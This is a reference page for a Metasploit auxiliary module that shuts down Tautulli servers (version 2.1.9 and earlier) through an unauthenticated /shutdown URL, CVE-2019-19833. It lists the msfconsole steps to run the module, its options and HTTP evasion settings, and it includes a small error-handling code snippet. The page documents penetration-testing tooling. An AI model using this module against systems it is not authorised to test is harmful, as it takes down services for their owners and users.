Tautulli v2.1.9 - Shutdown Denial of Service - Metasploit


This page contains detailed information about how to use the auxiliary/dos/http/tautulli_shutdown_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Tautulli v2.1.9 - Shutdown Denial of Service
Module: auxiliary/dos/http/tautulli_shutdown_exec
Source code: modules/auxiliary/dos/http/tautulli_shutdown_exec.rb
Disclosure date: -
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8181, 8443, 8880, 8888
List of CVEs: CVE-2019-19833

Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/dos/http/tautulli_shutdown_exec
msf auxiliary(tautulli_shutdown_exec) > show targets
    ... a list of targets ...
msf auxiliary(tautulli_shutdown_exec) > set TARGET target-id
msf auxiliary(tautulli_shutdown_exec) > show options
    ... show and set options ...
msf auxiliary(tautulli_shutdown_exec) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL in applications that do not have a user login area enabled.

Scenario


72550314-80cd8a00-38a3-11ea-9bad-942668a29390

Verification Steps :


List the steps needed to make sure this thing works

  1. Start msfconsole
  2. use auxiliary/dos/http/tautulli_shutdown_exec
  3. set RHOSTS XXX.XXX.XXX.XXX
  4. run

Go back to menu.

Msfconsole Usage


Here is how the dos/http/tautulli_shutdown_exec auxiliary module looks in the msfconsole:

msf6 > use auxiliary/dos/http/tautulli_shutdown_exec

msf6 auxiliary(dos/http/tautulli_shutdown_exec) > show info

       Name: Tautulli v2.1.9 - Shutdown Denial of Service
     Module: auxiliary/dos/http/tautulli_shutdown_exec
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Ismail Tasdelen

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    8181             yes       The target port (TCP)
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Description:
  Tautulli versions 2.1.9 and prior are vulnerable to denial of 
  service via the /shutdown URL.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2019-19833
  https://www.exploit-db.com/exploits/47785

Module Options


This is a complete list of options available in the dos/http/tautulli_shutdown_exec auxiliary module:

msf6 auxiliary(dos/http/tautulli_shutdown_exec) > show options

Module options (auxiliary/dos/http/tautulli_shutdown_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    8181             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the dos/http/tautulli_shutdown_exec auxiliary module:

msf6 auxiliary(dos/http/tautulli_shutdown_exec) > show advanced

Module advanced options (auxiliary/dos/http/tautulli_shutdown_exec):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the dos/http/tautulli_shutdown_exec module can do:

msf6 auxiliary(dos/http/tautulli_shutdown_exec) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the dos/http/tautulli_shutdown_exec auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(dos/http/tautulli_shutdown_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

No reply from <RHOST>


Here is a relevant code snippet related to the "No reply from <RHOST>" error message:

27:	    })
28:	
29:	    if res
30:	      print_status("Request sent to #{rhost}")
31:	    else
32:	      print_status("No reply from #{rhost}")
33:	    end
34:	  rescue Errno::ECONNRESET
35:	    print_status('Connection reset')
36:	  end
37:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


Ismail Tasdelen

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.